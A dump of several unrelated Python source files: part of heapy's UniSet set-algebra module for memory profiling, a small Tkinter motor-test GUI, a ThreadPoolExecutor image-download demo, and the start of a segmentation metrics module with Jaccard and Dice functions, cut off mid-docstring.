        reprs = [repr(k) for k in a.arg]
        reprs.sort()
        return '(%s)' % ' | '.join(reprs)
class InvertFamily(Family):
    # Family of complements: a set wraps one atom (a.arg) and represents
    # everything NOT in it.
    opname = 'INVERT'
    isatom = False
    isfactor = True
    def __call__(self, a):
        assert a.fam.isatom
        if a is self.mod.Nothing:
            return self.mod.NotNothing
        else:
            return Family.__call__(self, a)
    def c_test_contains(self, a, b, env):
        return env.test_contains_not(a.arg, b, 'InvertFamily')
    def c_contains(self, a, b):
        # b is in the complement iff it is not in the wrapped set.
        return not b in a.arg
    def c_and(self, a, b):
        return b.fam._and_INVERT(b, a)
    _and_AND = c_and
    def _and_FACTOR(self, a, b):
        # ~a.arg & ~b.arg
        # ~a.arg & b
        # Is normal form?
        x = a.arg & b
        if x.fam.isatom:
            a = self(x)
        return self.mod.fam_And(a, b)
    _and_ATOM = _and_INVERT = _and_FACTOR
    def _and_ID(self, a, b):
        # Complement against an identity set: remove the overlap.
        return b - (b & a.arg)
    def _factordisjoint_ATOM(self, a, b):
        # ~ a.arg <disjoint> b
        return b <= a.arg
    def _factordisjoint_INVERT(self, a, b):
        # ~ a.arg <disjoint> ~b.arg
        return False
    def c_le(self, a, b):
        return b.fam._ge_INVERT(b, a)
    _le_AND = c_le
    def _le_ATOM(self, a, b):
        # ~a.arg <= b
        return False
    def _le_INVERT(self, a, b):
        # ~a.arg <= ~b.arg
        return b.arg <= a.arg
    def c_ge(self, a, b):
        # ~a.arg >= b
        return a.arg.disjoint(b)
    _ge_ATOM = _ge_INVERT = _ge_AND = c_ge
    def c_or(self, a, b):
        return b.fam._or_INVERT(b, a)
    _or_AND = c_or
    def _or_FACTOR(self, a, b):
        # ~a.arg | b
        if a.arg <= b:
            return ~self.mod.Nothing
        x = a.arg & b
        if x is self.mod.Nothing:
            return a
        return self.mod.fam_Or(a, b)
    _or_ATOM = _or_INVERT = _or_FACTOR
    def c_invert(self, a):
        # ~(~a.arg) = a.arg
        return a.arg
    def c_get_render(self, a):
        return a.arg.get_render()
    def c_get_brief(self, a):
        # Parenthesize multi-word names that are not already bracketed.
        n = a.arg.brief
        if (not (n.startswith('(') or n.startswith('<')) and
                ' ' in n):
            n = '(%s)' % n
        return '~%s' % n
    def c_get_ckc(self, a):
        # This uses only existing machinery for C-level classification.
        # The alternatives are discussed in Notes 21 Sep 2005.
        return (
            a.arg.biper.classifier,
            0,
            '!='
        )
    def c_repr(self, a):
        return '~%s' % repr(a.arg)
class FamilyFamily(AtomFamily):
    """Atom family whose member sets each denote 'all UniSets belonging
    to one particular Family instance' (stored as the set's arg)."""

    def __init__(self, mod):
        AtomFamily.__init__(self, mod)
        # Expose .union on such sets, delegating to the wrapped family's
        # own fam_union().
        self.add_export('union', lambda x: x.arg.fam_union())

    def c_contains(self, a, b):
        # b belongs iff it is a UniSet whose family is exactly a.arg.
        if not isinstance(b, UniSet):
            return False
        return b.fam is a.arg

    def c_get_brief(self, c):
        family_class = c.arg.__class__
        return '<Family: %s>' % family_class
class IdentitySetFamily(AtomFamily):
    # Family of identity sets: concrete collections of live objects,
    # identified by address (node sets).  Also provides the printing,
    # partitioning and equivalence-relation services for them.
    def __init__(self, mod):
        AtomFamily.__init__(self, mod)
        self.defrefining(mod.Anything)
        self.immnodeset = mod.immnodeset
        self.Part = mod.Part
        self.Path = mod.Path
        self.RefPat = mod.RefPat
        self.View = mod.View
        self.Use = mod.Use
    def __call__(self, *args, **kwds):
        return self._cons(args, **kwds)
    def _cons(self, arg, er=None):
        # arg is a sequence of nodes
        arg = self.immnodeset(arg)
        if not arg:
            return self.mod.Nothing
        elif len(arg) == 1:
            # Singleton sets get the specialized class.
            r = IdentitySetSingleton(self, tuple(arg)[0])
        else:
            r = IdentitySetMulti(self, arg)
        if er is not None:
            # Pre-seed the equivalence relation used for partitioning.
            r._er = er
        return r
    def c_and(self, a, b):
        if b.fam is self:
            return self._cons(a.nodes & b.nodes)
        elif b.fam is self.mod.fam_Invert:
            return self._and_INVERT(a, b)
        else:
            return b.fam._and_ID(b, a)
    def _and_ATOM(self, a, b):
        if b.fam is self:
            return self._cons(a.nodes & b.nodes)
        else:
            return b.fam._and_ID(b, a)
    def _and_AND(self, a, b):
        return b.fam._and_ID(b, a)
    def _and_ID(self, a, b):
        return self._cons(a.nodes & b.nodes)
    def _and_INVERT(self, a, b):
        if b.arg.fam is self:
            # Complement of a concrete set: plain node-set difference.
            return self._cons(a.nodes - b.arg.nodes)
        elif b is self.mod.NotNothing:
            return a
        else:
            return b.fam._and_ID(b, a)
    def c_get_ckc(self, a):
        return self.mod.Classifiers.Idset.classifier, a.nodes, '<='
    def c_hash(self, a):
        return hash(a.nodes)
    def c_iter(self, a):
        # It's not well-defined to iterate and is considered error-prone
        # and may be SO much slower than expected
        # they need to be explicit to iterate over elements or partition subset
        raise TypeError('iteration over non-sequence')
    def c_len(self, a):
        # The length corresponds to
        # o the number of rows in how it is printed
        # o the max getitem-wise index + 1
        # (Notes May 13 2005)
        return a.partition.numrows
    def c_contains(self, a, b):
        return b in a.nodes
    def c_le(self, a, b):
        if not b.fam is self:
            # Project b onto a's nodes first, then compare node sets.
            b = b.fam._and_ID(b, a)
        return a.nodes <= b.nodes
    _le_ATOM = _le_INVERT = _le_AND = c_le
    def c_or(self, a, b):
        if b.fam is self:
            return self._cons(a.nodes | b.nodes)
        else:
            # Keep only the part of a not already covered by b.
            a = a - b.fam._and_ID(b, a)
            return b.fam._or_ATOM(b, a)
    _or_ATOM = _or_INVERT = _or_AND = _or_OR = c_or
    def c_get_brief(self, c):
        return self.get_str_summary(c)
    def c_get_render(self, a):
        return a.kind.get_render()
    def c_getitem(self, a, idx):
        return a.partition.get_set(idx)
    def c_str(self, a):
        return a.more._oh_printer.get_str_of_top()
    def maprox_getattr(self, set, name):
        # MappingProxy support: gather getattr(x, name) over all nodes,
        # silently skipping nodes lacking the attribute.
        ns = self.mod.mutnodeset()
        for x in set.nodes:
            try:
                v = getattr(x, name)
            except AttributeError:
                pass
            else:
                ns.add(v)
        return self._cons(self.mod.immnodeset(ns))
    def maprox_getitem(self, set, idx):
        # MappingProxy support: gather x[idx] over all nodes, skipping
        # nodes where the subscript fails.
        ns = self.mod.mutnodeset()
        for x in set.nodes:
            try:
                v = x[idx]
            except (KeyError, IndexError):
                pass
            else:
                ns.add(v)
        return self._cons(self.mod.immnodeset(ns))
    def c_get_idpart_header(self, a):
        return 'Kind: Name/Value/Address'
    def c_get_idpart_label(self, a):
        return ''
    def c_get_idpart_render(self, a):
        def render(x):
            x = self.mod.iso(x)
            r = x.brief.lstrip('<1 ').rstrip('>')
            return r
        return render
    def get_by(self, a, er):
        # Return a with its partitioning equivalence relation set to er;
        # er may be an EquivalenceRelation or a '&'-joined name string.
        ers = []
        if isinstance(er, EquivalenceRelation):
            ers.append(er)
        else:
            try:
                ss = er.split('&')
            except Exception:
                raise TypeError(
                    'by(): Equivalence relation or string expected.')
            if ss == ['']:
                ss = []
            for s in ss:
                try:
                    # NOTE(review): a name already starting with 'er_' gets
                    # the prefix prepended again here — looks like the
                    # condition was meant to be negated/combined; confirm.
                    if not s.istitle() or s.startswith('er_'):
                        s = 'er_'+s
                    er = getattr(self.Use, s)
                except AttributeError:
                    raise ValueError(
                        'by(): No such equivalence relation defined in heapy.Use: %r' % s)
                ers.append(er)
        if not ers:
            er = self.Use.Unity
        else:
            # Combine the named relations by intersection.
            er = ers[0]
            for i in range(1, len(ers)):
                er &= ers[i]
        if a.er is not er:
            a = self._cons(a.nodes, er=er)
        return a
    def get_er(self, a):
        # The set's equivalence relation; defaults lazily to Clodo.
        try:
            er = a._er
        except AttributeError:
            er = self.mod.Use.Clodo
            a._er = er
        return er
    def get_more(self, a):
        # Lazily-created pager over the set's partition printout.
        try:
            m = a._more
        except AttributeError:
            m = self.mod.OutputHandling.more_printer(a, a.partition)
            a._more = m
        return m
    def get_all(self, a):
        return a.more.all
    def get_owners(self, a):
        return self.mod.Use.Clodo.classifier.owners(a)
    def get_partition(self, a):
        # Lazily partition the set by its equivalence relation.
        try:
            p = a._partition
        except AttributeError:
            a.fam.View.clear_check()
            p = a.fam.Part.partition(a, a.er)
            a._partition = p
        return p
    def get_str_idpart(self, set, cla):
        # Get the string that is used for the 'identity partition'
        # when the objects share a common classification (cla)
        s = cla.fam.c_get_str_for(cla, set)
        return s
    def get_str_refpat(self, set, cla, max_length):
        # Get the string that is used at the end of a reference pattern line
        strs = []
        strs.append('%d ' % set.count)
        strs.append(cla.fam.c_get_str_for(cla, set))
        strs.append(': ')
        strs.append(self.get_str_rendered(
            set, cla, max_length-len(''.join(strs))))
        s = ''.join(strs)
        if len(s) > max_length:
            s = s[:max_length - 3]+'...'
        return s
    def get_str_rendered(self, set, cla, max_length=None):
        # Render the individual nodes (comma-separated, sorted),
        # truncating with '...' once max_length would be exceeded.
        if max_length is None:
            max_length = 50
        strs = []
        lens = 0
        render = cla.get_render()
        for p in set.nodes:
            rs = render(p)
            if lens and lens + len(rs) + 2 >= max_length:
                strs[-1] += '...'  # but what can be done in limited time
                break
            lens += len(rs) + 2
            strs.append(rs)
        strs.sort()
        return ', '.join(strs)
    def get_str_summary(self, c, max_length=None, er=None):
        # One-line '<count kind: items...>' summary of the set, grouped
        # by the classes of its equivalence relation.
        if max_length is None:
            max_length = self.mod.max_summary_length
        if er is None:
            er = c.er
        set = c.nodes
        items = er.classifier.partition(set)
        keys = [k for k, v in items]
        cla = reduce(lambda x, y: x | y, keys)
        s = '<%d %s' % (len(set), cla.fam.c_get_str_for(cla, c))
        s += ': '
        bslen = len(s)
        bstrs = []
        for cla, set in items:
            css = self.get_str_rendered(set, cla, max_length-bslen)
            if len(items) > 1:
                css = '<%d %s: %s>' % (set.count, cla, css)
            bstrs.append(css)
            bslen += len(css) + 3
            if bslen > max_length:
                break
        # Don't use the initial count when comparing
        if len(bstrs) > 1:
            bstrs.sort(key=lambda x: x[x.index(' '):])
        s += ' | '.join(bstrs) + '>'
        if len(s) > max_length:
            s = s[:max_length-4]+'...>'
        return s
    def get_parts(self, X):
        return [x for x in X.partition.get_sets()]
    def get_theone(self, set):
        if len(set.nodes) == 1:
            return list(set.nodes)[0]
        raise ValueError('theone requires a singleton set')
    def get_prod(self, set):
        # Producer traceback (via tracemalloc) for the single object in a
        # singleton set; returns None when no traceback is recorded.
        obj = self.get_theone(set)
        self.mod.Use._check_tracemalloc()
        tb = self.mod.tracemalloc.get_object_traceback(obj)
        if tb is None:
            return
        try:
            frames = tb.format(most_recent_first=True)
        except TypeError:
            # Py < 3.7
            frames = tb.format()
        # TODO: move to a delicated file
        class Printer:
            def _oh_get_line_iter(self):
                yield 'Traceback (most recent call first):'
                yield from frames
        printer = Printer()
        printer.mod = self.mod
        self.mod.OutputHandling.setup_printing(printer)
        return printer
class EmptyFamily(IdentitySetFamily):
    """Family of the unique empty set, UniSet.Nothing.

    It derives from IdentitySetFamily so the exported identity-set
    methods keep working (its .nodes is an empty immnodeset); the
    overrides below are short-circuit optimizations plus the special
    'Nothing' representations.  Other families assume these methods
    exist on the EmptyFamily.
    """

    def __init__(self, mod):
        IdentitySetFamily.__init__(self, mod)

    def c_and(self, a, b):
        # Nothing & X == Nothing, whatever X is.
        return a
    _and_ATOM = _and_INVERT = _and_AND = _and_OR = _and_ID = c_and

    def c_contains(self, a, b):
        # The empty set contains no object.
        return False

    def c_ge(self, a, b):
        # Nothing >= b only when b is Nothing itself.
        return b is a
    _ge_ATOM = _ge_INVERT = _ge_AND = c_ge

    def c_get_brief(self, a):
        return '<Nothing>'

    def c_repr(self, a):
        return '%s%s' % (self.mod.Use.reprefix, 'Nothing')

    def c_iter(self, a):
        # Iterating the empty set yields no elements.
        return iter(())

    def c_le(self, a, b):
        # Nothing is a subset of every set.
        return True
    _le_ATOM = _le_INVERT = _le_AND = c_le

    def c_len(self, a):
        return 0

    def c_nonzero(self, a):
        return False

    def c_or(self, a, b):
        # Nothing | X == X.
        return b
    _or_ATOM = _or_INVERT = _or_AND = _or_OR = c_or

    def c_str(self, a):
        return self.c_get_brief(a)

    def c_sub(self, a, b):
        # Nothing - X == Nothing.
        return a

    def c_xor(self, a, b):
        # Nothing ^ X == X.
        return b
class EquivalenceRelationFamily(AtomFamily):
    # Family of EquivalenceRelation objects; constructs relations from
    # classifier constructors and implements their set algebra.
    def __init__(self, mod):
        AtomFamily.__init__(self, mod)
        self.Set = EquivalenceRelation
        self.Use = mod.Use
        self.Classifiers = mod.Classifiers
    def __call__(self, constructor, *args, **kwds):
        # Passing classifier constructor rather than constructed classifier,
        # to make sure there is a 1-1 relation between equivalence relations and classifers.
        cl = constructor(*args, **kwds)
        er = self.Set(self, cl)
        cl.er = er
        return er
    def c_contains(self, a, b):
        # XXX should have a smoother protocol
        try:
            return len(b.by(a)) == 1
        except AttributeError:
            try:
                ckc = b.get_ckc()
            except Exception:
                return False
            else:
                return ckc[0].er <= a and ckc[2] == '=='
    def c_getattr(self, a, name):
        # Delegate unknown attributes to the classifier, when it offers a
        # per-relation attribute hook.
        classifier = a.classifier
        try:
            g = getattr(classifier, 'get_attr_for_er')
        except AttributeError:
            raise AttributeError(name)
        return g(name)
    def c_and(self, a, b):
        # Intersection of relations: combine their (flattened) component
        # relations, drop redundant ones, and build a combined classifier.
        if b.fam is not self:
            return AtomFamily.c_and(self, a, b)
        ers = []
        for x in (a, b):
            if x.erargs:
                ers.extend(x.erargs)
            else:
                ers.append(x)
        ers = minimals(ers)
        if len(ers) == 1:
            return ers[0]
        er = self.Classifiers.mker_and(ers)
        er.erargs = tuple(ers)
        return er
    def _ge_ATOM(self, a, b):
        # a >= b iff a's classifier is among b's super-classifiers.
        if b.fam is self:
            return a.classifier in b.classifier.super_classifiers
        return False
    def _le_ATOM(self, a, b):
        if b.fam is self:
            return b.classifier in a.classifier.super_classifiers
        return False
    def c_call(self, a, args, kwds):
        return a.classifier.get_userkind(*args, **kwds)
    def c_get_brief(self, a):
        return 'Equiv. relation %s' % a.classifier
    def c_getitem(self, a, idx):
        # Relational image of a node set under this relation.
        return a.classifier.relimg(self.mod.nodeset_adapt(idx))
    def c_repr(self, a):
        return a.classifier.get_reprname()
class Summary_str:
    # Maps a type to a short one-line rendering function used in set
    # summaries; __call__ looks up (or synthesizes) the renderer.
    def __init__(self, mod):
        self.mod = mod
        types = mod.types._module
        # invtypes: type object -> dotted name for printing.
        self.invtypes = {}
        for k, v in sorted(types.__dict__.items()):
            if isinstance(v, type):
                self.invtypes[v] = 'types.%s' % k
        for k, v in sorted(types.__builtins__.items()):
            if isinstance(v, type):
                self.invtypes[v] = k
        # This is to make common printouts prettier / shorter (: and clearer ? :)
        # but may be disabled for clearer repr()
        self.shorter_invtypes = {}
        for name in ('module', 'function'):
            t = getattr(types, name.capitalize()+'Type')
            self.shorter_invtypes[t] = name
        self.table = {
            mod.NodeSet: self.str_address_len,
            bool: self.str_repr,
            types.BuiltinFunctionType: self.str_builtin_function,
            types.CodeType: self.str_code,
            complex: self.str_repr,
            dict: self.str_address_len,
            float: self.str_repr,
            types.FrameType: self.str_frame,
            types.FunctionType: self.str_function,
            int: self.str_repr,
            list: self.str_address_len,
            type(None): self.str_repr,
            types.MethodType: self.str_method,
            types.ModuleType: self.str_module,
            types.TracebackType: self.str_traceback,
            bytes: self.str_limrepr,
            str: self.str_limrepr,
            tuple: self.str_address_len,
            type: self.str_type,
        }
    def __call__(self, key, longer=False):
        # Return the renderer for type 'key'; metatypes render as types,
        # unknown types fall back to the address renderer.
        x = self.table.get(key)
        if x is None:
            if issubclass(key, type):
                x = self.str_type
            else:
                x = self.str_address
        # NOTE(review): 'x.__func__' assumes a bound method; table entries
        # that are plain builtins (str_repr is repr) have no __func__ and
        # would raise here when longer=True — confirm intended usage.
        if longer and 'longer' in x.__func__.__code__.co_varnames:
            return lambda k: x(k, longer=longer)
        else:
            return x
    def set_function(self, type, func):
        # Register a custom renderer for a type.
        self.table[type] = func
    def str_address(self, x):
        return hex(id(x))
    str_address._idpart_header = 'Address'
    str_address._idpart_sortrender = id
    def str_address_len(self, x):
        return self.str_address(x)+self.str_len(x)
    str_address_len._idpart_header = 'Address*Length'
    str_address_len._idpart_sortrender = id
    def str_builtin_function(self, x):
        # Qualify with module unless it is a plain builtin.
        n = x.__name__
        m = x.__module__
        if m != 'builtins':
            n = '%s.%s' % (m, n)
        return n
    str_builtin_function._idpart_header = 'Name'
    def str_code(self, x):
        return '%s:%d:%s' % (self.mod._root.os.path.basename(x.co_filename),
                             x.co_firstlineno,
                             x.co_name)
    str_code._idpart_header = 'File:Line:Name'
    def str_frame(self, x):
        return '<%s at %s>' % (x.f_code.co_name, self.str_address(x))
    str_frame._idpart_header = 'Name at Address'
    def str_function(self, x):
        return '%s.%s' % (x.__module__, x.__name__)
    str_function._idpart_header = 'Name'
    def str_len(self, x):
        return '*%d' % len(x)
    str_len._idpart_header = 'Length'
    def str_method(self, x):
        cn = self.str_type(x.__self__.__class__)
        if x.__self__ is not None:
            cn = '<%s at %s>' % (cn, self.str_address(x.__self__))
        func = x.__func__
        # NOTE(review): when func itself has a __func__, the function
        # OBJECT (not its name) is used below — possibly an oversight;
        # for ordinary methods the except branch yields the name.
        try:
            func_name = func.__func__
        except AttributeError:
            func_name = func.__name__
        return '%s.%s' % (cn, func_name)
    str_method._idpart_header = 'Type/<Type at address> . method'
    def str_module(self, x):
        return x.__name__
    str_module._idpart_header = 'Name'
    def str_limrepr(self, x):
        # Length-limited repr via the reprlib module.
        return self.mod._root.reprlib.repr(x)
    str_limrepr._idpart_header = 'Representation (limited)'
    str_limrepr._idpart_sortrender = 'IDENTITY'
    str_repr = repr
    def str_traceback(self, x):
        return '<in frame %s at %s>' % (self.str_frame(x.tb_frame), self.str_address(x))
    str_traceback._idpart_header = 'Frame at Address'
    def str_type(self, x, longer=False):
        # Prefer short aliases ('module', 'function') unless longer=True.
        if x in self.shorter_invtypes and not longer:
            return self.shorter_invtypes[x]
        if x in self.invtypes:
            return self.invtypes[x]
        if not hasattr(x, '__module__'):
            return f'<unknown module>.{x.__name__}'
        return f'{x.__module__}.{x.__name__}'
    str_type._idpart_header = 'Name'
    def str_type_longer(self, x):
        if x in self.invtypes:
            return self.invtypes[x]
        return '%s.%s' % (x.__module__, x.__name__)
    str_type._longer_method = lambda x: str_type
def maximals(A, le=lambda x, y: x <= y):
    """Return the maximal element(s) of a partially ordered sequence.

    An element is kept when no element of A is strictly greater under
    le; an element comparable-below an already-kept one is not added
    again, so equivalent duplicates appear only once.
    """
    kept = []
    for cand in A:
        if any(le(cand, other) and not le(other, cand) for other in A):
            continue  # strictly dominated by some element
        if not any(le(cand, prev) for prev in kept):
            kept.append(cand)
    return kept
def minimals(A, le=lambda x, y: x <= y):
    """Return the minimal element(s) of a sequence of partially ordered
    elements.

    An element is kept when no element of A is strictly smaller under
    le; an element comparable-above an already-kept one is not added
    again, so equivalent duplicates appear only once.
    """
    kept = []
    for cand in A:
        if any(le(other, cand) and not le(cand, other) for other in A):
            continue  # strictly dominated by some element
        if not any(le(prev, cand) for prev in kept):
            kept.append(cand)
    return kept
class _GLUECLAMP_:
    """Module glue ('clamp') for the UniSet subsystem.

    Attributes named _get_<name> are lazy initializers resolved on first
    access; _imports_ declares names pulled from sibling/parent modules.
    """

    # Tunable settings; those listed in _chgable_ may be changed at runtime.
    max_summary_length = 80
    auto_convert_type = True
    auto_convert_iter = False  # Can give problems if enabled; notes 22/11-04
    out_reach_module_names = ('UniSet', 'View', 'Path', 'RefPat')
    _chgable_ = ('max_summary_length', 'out_reach_module_names',
                 'auto_convert_type', 'auto_convert_iter', 'output')
    # _preload_ = ('_hiding_tag_',)
    # Module 'imports'
    _imports_ = (
        '_parent:Classifiers',
        '_parent:ImpSet',
        '_parent.ImpSet:emptynodeset',
        '_parent.ImpSet:immnodeset',
        '_parent.ImpSet:mutnodeset',
        '_parent.ImpSet:NodeSet',
        '_parent:Part',
        '_parent:Path',
        '_parent:RefPat',
        '_parent:OutputHandling',
        '_parent:View',
        '_parent.View:_hiding_tag_',
        '_parent.View:hv',
        '_parent:Use',
        '_root:tracemalloc',
        '_root:types',
    )

    #
    # Lazily computed attributes.
    def _get_Anything(self): return self.Use.Unity.classifier.get_kind(None)

    def _get_Nothing(self): return IdentitySetMulti(
        EmptyFamily(self), self.emptynodeset)

    def _get_NotNothing(self): return Family.__call__(
        self.fam_Invert, self.Nothing)

    def _get_export_dict(self):
        """Collect _uniset_exports from the out-reach modules; reject conflicts."""
        d = {}
        for k, v in list(self.out_reach_dict.items()):
            sc = getattr(v, '_uniset_exports', ())
            for sc in sc:
                x = getattr(v, sc)
                if sc in d and d[sc] is not x:
                    raise RuntimeError(
                        'Duplicate export: %r defined in: %r' % (sc, k))
                d[sc] = x
        return d

    def _get_out_reach_dict(self):
        # Name -> module object for each module listed in out_reach_module_names.
        d = {}
        for name in self.out_reach_module_names:
            d[name] = getattr(self._parent, name)
        return d

    def _get_summary_str(self): return self.Summary_str(self)

    def _get_fam_And(self): return self.AndFamily(self)

    def _get_fam_EquivalenceRelation(
            self): return EquivalenceRelationFamily(self)

    def _get_fam_Or(self): return self.OrFamily(self)

    def _get_fam_IdentitySet(self): return self.IdentitySetFamily(self)

    def _get_fam_Invert(self): return self.InvertFamily(self)

    def _get_fam_Family(self): return self.FamilyFamily(self)

    def _get_fam_mixin_argatom(self):
        # Factory that builds (memoized per Mixin) a class combining the Mixin
        # with ArgAtomFamily, then instantiates it with the given arguments.
        memo = {}

        def f(Mixin, *args, **kwds):
            C = memo.get(Mixin)
            if C is None:
                class C(Mixin, self.ArgAtomFamily):
                    def __init__(self, mod, *args, **kwds):
                        mod.ArgAtomFamily.__init__(self, mod)
                        Mixin.__init__(self, mod, *args, **kwds)
                C.__qualname__ = C.__name__ = Mixin.__name__
                memo[Mixin] = C
            return C(self, *args, **kwds)
        return f

    def idset_adapt(self, X):
        """Return X as an IdentitySet (converting a NodeSet); verify hiding tag."""
        if isinstance(X, self.IdentitySet):
            ids = X
        elif isinstance(X, self.NodeSet):
            ids = self.idset(X)
        else:
            raise TypeError(
                'IdentitySet or NodeSet expected, got %r.' % type(X))
        if X._hiding_tag_ is not self._hiding_tag_:
            raise ValueError(
                "The argument has wrong _hiding_tag_, you may convert it by Use.idset or Use.iso.")
        return ids

    def idset(self, iterable, er=None):
        # Build an IdentitySet over an immutable node set from any iterable.
        return self.fam_IdentitySet._cons(self.immnodeset(iterable), er=er)

    def _get_iso(self):
        return self.fam_IdentitySet

    def isuniset(self, obj):
        return isinstance(obj, self.UniSet)
    # Or has some particular attributes?

    def nodeset_adapt(self, X):
        """Return X as a NodeSet (unwrapping an IdentitySet); verify hiding tag."""
        if isinstance(X, self.NodeSet):
            ns = X
        elif isinstance(X, self.IdentitySet):
            ns = X.nodes
        else:
            raise TypeError(
                'IdentitySet or NodeSet expected, got %r.' % type(X))
        if X._hiding_tag_ is not self._hiding_tag_:
            raise ValueError(
                "The argument has wrong _hiding_tag_, you may convert it by Use.idset or Use.iso.")
        return ns

    def retset(self, X):
        # Normalize a return value to an IdentitySet.
        if not isinstance(X, self.IdentitySet):
            X = self.idset(X)
        return X

    def union(self, args, maximized=False):
        """Union of a sequence of sets; Nothing for an empty sequence."""
        if not args:
            return self.Nothing
        a = args[0]
        for b in args[1:]:
            a |= b
        return a
        # NOTE: everything below is unreachable; kept per the original note
        # that the fam_Or optimization broke for idsets.
        # This optimization didn't work for idsets!!
        # XXX to fix back
        if not maximized:
            args = maximals(args)
        return self.fam_Or._cons(args)

    def uniset_from_setcastable(self, X):
        """Coerce X (UniSet / type / NodeSet / iterable) into a UniSet carrying
        this module's hiding tag; raise TypeError when not convertible."""
        if isinstance(X, UniSet) and X._hiding_tag_ is self._hiding_tag_:
            return X
        types = self.types  # NOTE(review): apparently unused — confirm before removing
        if isinstance(X, type) and self.auto_convert_type:
            return self.Use.Type(X)
        elif isinstance(X, self.NodeSet) and X._hiding_tag_ is self._hiding_tag_:
            return self.idset(X)
        elif self.auto_convert_iter:
            try:
                it = iter(X)
            except TypeError:
                pass  # Will raise a 'more informative' exception below
            else:
                return self.idset(it)
        raise TypeError(
            "Argument is not automatically convertible to a UniSet with correct _hiding_tag_.")
|
994,224 | f36c81329179aa9b48f91188f9cd5a87f6255635 | ## Motor Test GUI
from Tkinter import Tk, BOTH, RIGHT, RAISED, Listbox, END, LEFT
from ttk import Frame, Button, Style
class Motor(Frame):
    """Small Tk window with a result listbox and motor-test buttons.

    The listbox is kept as an instance attribute (the original used a
    module-level ``global lb``) so the widget state is owned by the frame
    and multiple Motor frames could coexist safely.
    """

    def __init__(self, parent):
        Frame.__init__(self, parent)
        self.parent = parent
        self.initUI()

    def initUI(self):
        """Build the widgets: the log listbox plus Close/Test/Clear buttons."""
        self.parent.title("Motor Test")
        self.style = Style()
        # self.style.theme_use("clam")
        self.lb = Listbox(self)
        self.lb.pack(fill = BOTH, expand = 1)
        frame = Frame(self, relief = RAISED, borderwidth = 1)
        frame.pack(fill = BOTH, expand = 1)
        self.pack(fill = BOTH, expand = 1)
        closeButton = Button(self, text = 'Close', command = self.quit)
        closeButton.pack(side = RIGHT, padx = 5, pady = 5)
        test1Button = Button(self, text = 'Test 1', command = self.runTest1)
        test1Button.pack(side = RIGHT)
        test2Button = Button(self, text = 'Test 2', command = self.runTest2)
        test2Button.pack(side = RIGHT)
        clearButton = Button(self, text = 'Clear', command = self.clearTxt)
        clearButton.pack(side = LEFT)

    def runTest1(self):
        # Placeholder: report completion in the log listbox.
        self.lb.insert(END, 'Test 1 Complete')

    def runTest2(self):
        self.lb.insert(END, 'Test 2 Complete')

    def clearTxt(self):
        # Remove every line from the log listbox.
        self.lb.delete(0, END)
def main():
    """Create the application window and enter the Tk event loop."""
    root = Tk()
    root.geometry("400x300")
    Motor(root)
    root.mainloop()


if __name__ == '__main__':
    main()
|
994,225 | fb7d9a4f02beeaac817c4909f7873490b069f691 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 6 04:21:23 2020
@author: levitannin
Working on threadding module in python.
Threading vs Multiprocessing
Multiprocessing -- library uses separate memory space, multiple CPU cores,
bypasses GIL limitations in CPython, child processes are killable (function
calls in program) and is easier to use. Caveats of the module are a larger
memory footprint and IPC's a little more complicated with more overhead
Threading -- multithreading is a lightweight, memory-sharing library responsible
for UI and used well for I/O bound applications. It is not killable and
subject to GIL.
Multiple threads live in the same process in the same space, each thread
with a specific task and it's own code, stack memory, pointer, and share
heap memory. Memory leak can be damaging to other threads.
Concurrent.Futures -- library with new multiprocessing abilities. Automatically
joins iterative processes. ProcessPoolExecutor is for CPU intensive tasks.
ThreadPoolExecutor is better for network operations or I/O
In either case, executor.map() which allows multiple calls to a provided
function, passing each of the items in an iterable to that function. Here;
functions are called concurrently.
for multiprocessing the iterable is broken into chunks,
the size of which can be controlled using key chunk_size
http://masnun.com/2016/03/29/python-a-quick-introduction-to-the-concurrent-futures-module.html
"""
import requests
import time
import concurrent.futures
# Unsplash photos downloaded by the demo; the photo id (4th URL path
# component) becomes the local file name.
img_urls = [
    'https://images.unsplash.com/photo-1516117172878-fd2c41f4a759',
    'https://images.unsplash.com/photo-1532009324734-20a7a5813719',
    'https://images.unsplash.com/photo-1524429656589-6633a470097c',
    'https://images.unsplash.com/photo-1530224264768-7ff8c1789d79',
    'https://images.unsplash.com/photo-1564135624576-c5c88640f235',
    'https://images.unsplash.com/photo-1541698444083-023c97d3f4b6',
    'https://images.unsplash.com/photo-1522364723953-452d3431c267',
    'https://images.unsplash.com/photo-1513938709626-033611b8cc03',
    'https://images.unsplash.com/photo-1507143550189-fed454f93097',
    'https://images.unsplash.com/photo-1493976040374-85c8e12f0c0e',
    'https://images.unsplash.com/photo-1504198453319-5ce911bafcde',
    'https://images.unsplash.com/photo-1530122037265-a5f1f91d3b99',
    'https://images.unsplash.com/photo-1516972810927-80185027ca84',
    'https://images.unsplash.com/photo-1550439062-609e1531270e',
    'https://images.unsplash.com/photo-1549692520-acc6669e2f0c'
]

# Wall-clock start for the timing report printed at the end of the script.
t1 = time.perf_counter()
def download_image(img_url):
    """Download one image and save it as '<photo-id>.jpg' in the CWD.

    Args:
        img_url: Full Unsplash image URL; its 4th path component is used
            as the local file name.
    """
    # Give the request a timeout: the original call could block a worker
    # thread forever on a stalled connection.
    # NOTE(review): an HTTP error still saves the error body verbatim, as
    # before; consider response.raise_for_status() if that is unwanted.
    response = requests.get(img_url, timeout=30)
    img_bytes = response.content
    img_name = img_url.split('/')[3]
    img_name = f'{img_name}.jpg'
    with open(img_name, 'wb') as img_file:
        img_file.write(img_bytes)
        print(f'{img_name} was downloaded...')
# Fetch all images concurrently; ThreadPoolExecutor suits this I/O-bound
# workload (threads overlap the network waits).
with concurrent.futures.ThreadPoolExecutor() as executor:
    executor.map(download_image, img_urls)

t2 = time.perf_counter()

print(f'Finished in {t2-t1} seconds')
994,226 | f3e0732e9fe98f7ea53c41765471e35f6a42bdeb | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
metrics
holds metrics to evaluate results
Author: Jacob Reinhold (jacob.reinhold@jhu.edu)
Created on: January 14, 2019
"""
__all__ = ['jaccard', 'dice', 'largest_cc']
import numpy as np
from skimage.measure import label
from torch import Tensor
def jaccard(x: Tensor, y: Tensor):
    """Jaccard index (IoU) between the positive-valued supports of x and y.

    Two empty masks are defined to have index 1.
    """
    x_mask = x > 0
    y_mask = y > 0
    union = (x_mask | y_mask).sum().float()
    if union == 0.:
        return 1.
    intersection = (x_mask & y_mask).sum().float()
    return intersection / union
def dice(x: Tensor, y: Tensor):
    """Dice coefficient between the positive-valued supports of x and y.

    Two empty masks are defined to have coefficient 1.
